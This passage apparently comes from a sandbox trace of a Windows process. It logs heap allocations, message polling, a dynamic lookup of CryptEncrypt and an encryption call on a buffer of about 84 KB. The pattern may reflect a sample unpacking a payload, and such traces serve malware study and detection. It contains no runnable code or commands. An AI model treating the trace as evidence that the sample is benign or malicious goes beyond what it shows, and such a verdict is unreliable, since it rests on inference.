[0225.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0225.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0225.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0225.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0225.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0225.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0225.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0225.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0225.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0225.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0225.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0225.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0225.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0225.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0225.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0225.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0225.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0225.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0225.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0225.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0225.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0225.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0225.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0225.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0225.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0225.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0225.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0225.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0225.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0225.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0225.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0225.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0225.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0225.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0225.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51490 [0225.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51490, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0225.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0225.033] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0225.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0225.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0225.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f7b0 [0225.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0225.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0225.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0225.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0225.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0225.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0225.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0225.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0225.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0225.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0225.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0225.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0225.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0225.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0225.033] CryptEncrypt (in: hKey=0xa875d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x14995, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x14998) returned 1 [0225.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0225.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0225.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0225.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0225.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0225.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0225.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0225.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0225.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0225.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0225.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0225.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0225.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.034] CharLowerBuffW (in: lpsz="byte[84376]", cchLength=0xb | out: lpsz="byte[84376]") returned 0xb [0225.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.038] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.038] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0225.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0225.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0225.038] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0225.067] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0225.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0225.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e512f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0225.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0225.068] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0225.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0225.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.068] CryptEncrypt (in: hKey=0xa875d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e94cd0*, pdwDataLen=0x8cef60*=0x14995, dwBufLen=0x14998 | out: pbData=0x2e94cd0*, pdwDataLen=0x8cef60*=0x14998) returned 1 [0225.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0225.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0225.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0225.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0225.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0225.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0225.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0225.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0225.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0225.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0225.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0225.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0225.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0225.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0225.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0225.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0225.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0225.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0225.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0225.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0225.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0225.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0225.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0225.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0225.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0225.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0225.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0225.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0225.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0225.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0225.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0225.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0225.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0225.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0225.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0225.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0225.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0225.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0225.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0225.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0225.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0225.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0225.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0225.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0225.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0225.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0225.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0225.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0225.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0225.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0225.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0225.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0225.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0225.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0225.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0225.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0225.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0225.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0225.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0225.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0225.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0225.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0225.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0225.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0225.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0225.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0225.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0225.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0225.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0225.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0225.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0225.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0225.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978518 | out: hHeap=0x970000) returned 1 [0225.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0225.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552c8 [0225.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55208 [0225.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0225.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0225.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0225.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0225.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0225.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0225.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0225.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0225.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0225.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55118 [0225.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0225.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0225.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0225.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0225.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0225.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0225.077] RtlAllocateHeap 